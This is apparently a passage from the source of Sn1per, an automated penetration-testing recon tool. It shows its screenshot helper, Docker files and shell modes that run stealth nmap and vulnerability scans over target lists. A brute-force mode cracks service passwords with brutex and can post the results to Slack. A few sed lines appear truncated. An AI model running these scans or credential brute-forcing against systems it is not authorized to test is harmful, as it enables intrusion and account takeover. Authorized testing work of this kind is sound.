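            f.write(json_urls)
        print('[*] Saved results to %s' % filename)
    else:
        print('[-] Found nothing')
--------------------------------------------------------------------------------
/bin/webscreenshot.js:
--------------------------------------------------------------------------------
/***
# This file is part of webscreenshot.
#
# Copyright (C) 2014, Thomas Debize
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see .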
***/

// Page(custom_headers, http_username, http_password) creates a PhantomJS
// webpage and returns an object exposing render(url, file). Rendering is
// driven by two timers: an idle timer armed whenever the count of
// outstanding requests drops to zero, and a hard timer armed once
// page.open() succeeds; whichever fires first renders the page and exits.
var Page = (function(custom_headers, http_username, http_password) {
    var opts = {
        width: 1200,
        height: 800,
        ajaxTimeout: 400,        // ms of network idle before rendering
        maxTimeout: 800,         // ms after a successful open before forcing a render
        httpAuthErrorCode: 2     // process exit code used to signal a 401
    };

    var requestCount = 0;
    var forceRenderTimeout;
    var ajaxRenderTimeout;

    var page = require('webpage').create();
    page.viewportSize = {
        width: opts.width,
        height: opts.height
    };

    page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
    // HTTP basic-auth credentials exactly as received from the command line (see main()).
    page.settings.userName = http_username;
    page.settings.password = http_password;

    page.customHeaders = custom_headers;

    // The extra headers are cleared once the page is initialised —
    // presumably so they are sent with the initial request only and not
    // with every sub-resource; confirm against PhantomJS's onInitialized timing.
    page.onInitialized = function() {
        page.customHeaders = {};
    };
    // Silence confirmation messages and errors
    page.onConfirm = page.onPrompt = page.onError = noop;

    page.onResourceRequested = function(request) {
        requestCount += 1;
        clearTimeout(ajaxRenderTimeout);
    };

    page.onResourceReceived = function(response) {
        // Remember a 401 so render() can map the open failure to httpAuthErrorCode.
        if (response.stage && response.stage == 'end' && response.status == '401') {
            page.failReason = '401';
        }

        if (!response.stage || response.stage === 'end') {
            requestCount -= 1;
            if (requestCount === 0) {
                ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
            }
        }
    };

    var api = {};

    // Load url and write a screenshot to file. Exits the process with
    // httpAuthErrorCode on a 401, 1 on any other open failure, and 0 after
    // a successful render.
    api.render = function(url, file) {
        opts.file = file;

        page.open(url, function(status) {
            if (status !== "success") {
                if (page.failReason && page.failReason == '401') {
                    // Specific 401 HTTP code hint
                    phantom.exit(opts.httpAuthErrorCode);
                } else {
                    // All other failures
                    phantom.exit(1);
                }
            } else {
                forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
            }
        });
    };

    function renderAndExit() {
        // Trick to avoid transparent background
        page.evaluate(function() {
            document.body.bgColor = 'white';
        });

        page.render(opts.file);
        phantom.exit(0);
    }

    function noop() {}

    return api;
});

// Parse key=value style arguments (url_capture=, output_file=, header=,
// http_username=, http_password=) from the process arguments and render.
// NOTE(review): the credentials are read from the command line, so they
// are visible to anything able to list processes on the scanning host.
function main() {

    var system = require('system');
    var p_url = new RegExp('url_capture=(.*)');
    var p_outfile = new RegExp('output_file=(.*)');
    var p_header = new RegExp('header=(.*)');

    var p_http_username = new RegExp('http_username=(.*)');
    var http_username = '';

    var p_http_password = new RegExp('http_password=(.*)');
    var http_password = '';

    var temp_custom_headers = {
        // Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
        'Accept-Encoding': ' '
    };

    for(var i = 0; i < system.args.length; i++) {
        if (p_url.test(system.args[i]) === true)
        {
            var URL = p_url.exec(system.args[i])[1];
        }

        if (p_outfile.test(system.args[i]) === true)
        {
            var output_file = p_outfile.exec(system.args[i])[1];
        }

        if (p_http_username.test(system.args[i]) === true)
        {
            http_username = p_http_username.exec(system.args[i])[1];
        }

        if (p_http_password.test(system.args[i]) === true)
        {
            http_password = p_http_password.exec(system.args[i])[1];
        }

        if (p_header.test(system.args[i]) === true)
        {
            // "Name: value", split on ': ' and kept to two elements: a value
            // containing another ': ' is truncated there, and an argument
            // without the separator leaves header_value undefined.
            var header = p_header.exec(system.args[i]);
            var p_header_split = header[1].split(': ', 2);
            var header_name = p_header_split[0];
            var header_value = p_header_split[1];

            temp_custom_headers[header_name] = header_value;

        }
    }

    if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
        console.log("Usage: phantomjs [options] webscreenshot.js url_capture= output_file= [header= http_username=
http_password=]");
        console.log('Please specify an URL to capture and an output png filename !');

        phantom.exit(1);
    }
    else {
        var page = Page(temp_custom_headers, http_username, http_password);
        page.render(URL, output_file);
    }
}

main();
--------------------------------------------------------------------------------
/docker-compose-blackarch.yml:
--------------------------------------------------------------------------------
version: '3.9'

# Logging defaults declared as an anchor; no service below references it,
# so the json-file rotation settings are not applied to anything.
x-logging: &default-logging
  options:
    max-size: "40m"
    max-file: "10"
  driver: json-file

services:
  blackarch:
    container_name: blackarch
    build:
      context: .
      dockerfile: Dockerfile.blackarch
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.9'

# Logging defaults declared as an anchor; no service below references it,
# so the json-file rotation settings are not applied to anything.
x-logging: &default-logging
  options:
    max-size: "40m"
    max-file: "10"
  driver: json-file

services:
  kali-linux:
    container_name: kali-linux
    build:
      context: .
      dockerfile: Dockerfile
--------------------------------------------------------------------------------
/loot/README.md:
--------------------------------------------------------------------------------
# Sn1per - Automated Pentest Recon Scanner
![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)
--------------------------------------------------------------------------------
/modes/airstrike.sh:
--------------------------------------------------------------------------------
# AIRSTRIKE MODE #####################################################################################################
# Presumably sourced by the main sniper script: $MODE, $FILE, $REPORT and
# the logo function used here are not defined in this file. Runs one
# stealth scan per target listed in $FILE.
if [[ "$MODE" = "airstrike" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ "$AUTO_BRUTE" = "1" ]]; then 12 | args="$args -b" 13 | fi 14 | if [[ "$FULLNMAPSCAN" = "1" ]]; then 15 | args="$args -fp" 16 | fi 17 | if [[ "$OSINT" = "1" ]]; then 18 | args="$args -o" 19 | fi 20 | if [[ "$RECON" = "1" ]]; then 21 | args="$args -re" 22 | fi 23 | if [[ ! -z "$WORKSPACE" ]]; then 24 | args="$args -w $WORKSPACE" 25 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 26 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 27 | mkdir -p $WORKSPACE_DIR 2> /dev/null 28 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 29 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 30 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 31 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 32 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 33 | mkdir $WORKSPACE_DIR/output 2> /dev/null 34 | fi 35 | args="$args -m stealth --noreport --noloot" 36 | TARGET="$a" 37 | args="$args -t $TARGET" 38 | echo -e "$OKRED |" 39 | echo -e "$OKRED | |" 40 | echo -e "$OKRED | -/_\-" 41 | echo -e "$OKRED -/_\- ______________(/ . \)______________" 42 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" 43 | echo -e "$OKRED <> \___/ <> <>" 44 | echo -e "$OKRED " 45 | echo -e "$OKRED ||" 46 | echo -e "$OKRED <>" 47 | echo -e "$OKRED ||" 48 | echo -e "$OKRED <>" 49 | echo -e "$OKRED ||" 50 | echo -e "$OKRED || BIG" 51 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!" 52 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" 53 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" 54 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" 55 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 56 | echo -e "$OKRED | ||. | | | ||| |||||" 57 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 58 | echo -e "$OKRED | ||. | | | ||| |||||" 59 | echo -e "$OKRED __________________________________________________________" 60 | echo -e "$RESET" 61 | if [[ ! 
-z "$WORKSPACE_DIR" ]]; then 62 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 63 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 64 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 67 | fi 68 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 69 | else 70 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 71 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 72 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 73 | fi 74 | args="" 75 | done 76 | fi 77 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 78 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 79 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 80 | fi 81 | if [[ "$LOOT" = "1" ]]; then 82 | loot 83 | fi 84 | exit 85 | fi 86 | -------------------------------------------------------------------------------- /modes/bruteforce.sh: -------------------------------------------------------------------------------- 1 | if [[ "$AUTO_BRUTE" = "1" ]]; then 2 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null 3 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 4 | echo -e 
"${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | echo -e "$OKRED RUNNING BRUTE FORCE $RESET" 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 8 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 9 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 10 | fi 11 | brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null 12 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null 13 | rm -f $LOOT_DIR/credentials/brutex-$TARGET 14 | cd $INSTALL_DIR 15 | rm -f hydra.restore 16 | rm -f scan.log 17 | CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null) 18 | if [[ ${#CRACKED} -ge 5 ]]; then 19 | echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null 20 | fi 21 | echo "" 22 | rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null 23 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 24 | 25 | if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then 26 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt" 27 | fi 28 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 29 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 30 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] 
•?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 31 | fi 32 | else 33 | echo -e "$OKORANGE + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.$RESET" 34 | fi -------------------------------------------------------------------------------- /modes/discover.sh: -------------------------------------------------------------------------------- 1 | # DISCOVER MODE ##################################################################################################### 2 | if [[ "$MODE" = "discover" ]]; then 3 | if [[ "$REPORT" = "1" ]]; then 4 | if [[ ! -z "$WORKSPACE" ]]; then 5 | WORKSPACE="$(echo $WORKSPACE | tr / -)" 6 | args="$args -w $WORKSPACE" 7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 9 | mkdir -p $LOOT_DIR 2> /dev/null 10 | mkdir $LOOT_DIR/ips 2> /dev/null 11 | mkdir $LOOT_DIR/screenshots 2> /dev/null 12 | mkdir $LOOT_DIR/nmap 2> /dev/null 13 | mkdir $LOOT_DIR/notes 2> /dev/null 14 | mkdir $LOOT_DIR/reports 2> /dev/null 15 | mkdir $LOOT_DIR/output 2> /dev/null 16 | mkdir $LOOT_DIR/scans 2> /dev/null 17 | fi 18 | OUT_FILE="$(echo $TARGET | tr / -)" 19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 20 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null 21 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 22 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 23 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 24 | fi 25 | sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 26 | exit 27 | fi 28 | echo -e "$OKRED ____ /\\" 29 | 
echo -e "$OKRED Sn1per by @xer0dayz @Sn1perSecurity \ \\" 30 | echo -e "$OKRED https://sn1persecurity.com \ \\" 31 | echo -e "$OKRED ___ / \\" 32 | echo -e "$OKRED \ \\" 33 | echo -e "$OKRED === > [ \\" 34 | echo -e "$OKRED / \ \\" 35 | echo -e "$OKRED \ / /" 36 | echo -e "$OKRED === > [ /" 37 | echo -e "$OKRED / /" 38 | echo -e "$OKRED ___ \ /" 39 | echo -e "$OKRED / /" 40 | echo -e "$OKRED ____ / /" 41 | echo -e "$OKRED \/$RESET" 42 | echo "" 43 | OUT_FILE=$(echo $TARGET | tr / -) 44 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 45 | echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET" 46 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 47 | nmap -n -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 48 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt 49 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 50 | echo -e "$OKRED RUNNING TCP PORT SCAN $RESET" 51 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 52 | nmap -n -v -p $QUICK_PORTS $NMAP_OPTIONS -sS $TARGET -Pn 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null 53 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt 54 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 55 | echo -e "$OKRED RUNNING UDP PORT SCAN $RESET" 56 | echo 
-e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 57 | nmap -n -v -p $DEFAULT_UDP_PORTS $NMAP_OPTIONS -sU -Pn $TARGET 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null 58 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 59 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 60 | echo -e "$OKRED CURRENT TARGETS $RESET" 61 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 62 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt 63 | sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt 64 | cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt 65 | echo "" 66 | echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt " 67 | echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET" 68 | source $INSTALL_DIR/modes/sc0pe.sh 69 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 70 | echo -e "$OKRED SCAN COMPLETE! 
$RESET" 71 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 72 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 73 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 74 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 75 | fi 76 | sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE 77 | exit 78 | fi -------------------------------------------------------------------------------- /modes/fullportonly.sh: -------------------------------------------------------------------------------- 1 | # FULLPORTONLY MODE 2 | if [[ "$MODE" = "fullportonly" ]]; then 3 | if [[ "$REPORT" = "1" ]]; then 4 | args="-t $TARGET" 5 | if [[ ! -z "$WORKSPACE" ]]; then 6 | args="$args -w $WORKSPACE" 7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 9 | mkdir -p $LOOT_DIR 2> /dev/null 10 | mkdir $LOOT_DIR/domains 2> /dev/null 11 | mkdir $LOOT_DIR/screenshots 2> /dev/null 12 | mkdir $LOOT_DIR/nmap 2> /dev/null 13 | mkdir $LOOT_DIR/notes 2> /dev/null 14 | mkdir $LOOT_DIR/reports 2> /dev/null 15 | mkdir $LOOT_DIR/scans 2> /dev/null 16 | mkdir $LOOT_DIR/output 2> /dev/null 17 | fi 18 | args="$args --noreport -m fullportonly" 19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 20 | echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 21 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 22 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 23 | exit 24 | fi 25 | logo 
26 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 27 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 28 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 29 | fi 30 | echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 31 | if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then 32 | source /usr/share/sniper/pro/.portscanner.conf 33 | fi 34 | if [[ -z "$PORT" ]]; then 35 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 36 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 37 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 38 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 39 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 40 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 41 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 42 | else 43 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 44 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 45 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 46 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 47 | sed -r "s/ 
/dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 48 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 49 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 50 | fi 51 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null 52 | echo "$TARGET" >> $LOOT_DIR/scans/updated.txt 53 | rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null 54 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 55 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null) 56 | if [[ ${#HOST_UP} -ge 2 ]]; then 57 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null 58 | fi 59 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null 60 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null 61 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do 62 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 63 | done 64 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null 65 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null 66 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null 67 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 68 | /bin/bash 
"$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" 69 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" 70 | fi 71 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then 72 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 73 | cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 74 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then 75 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 76 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff" 77 | fi 78 | fi 79 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 80 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 81 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 82 | fi 83 | if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then 84 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 85 | echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET" 86 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date 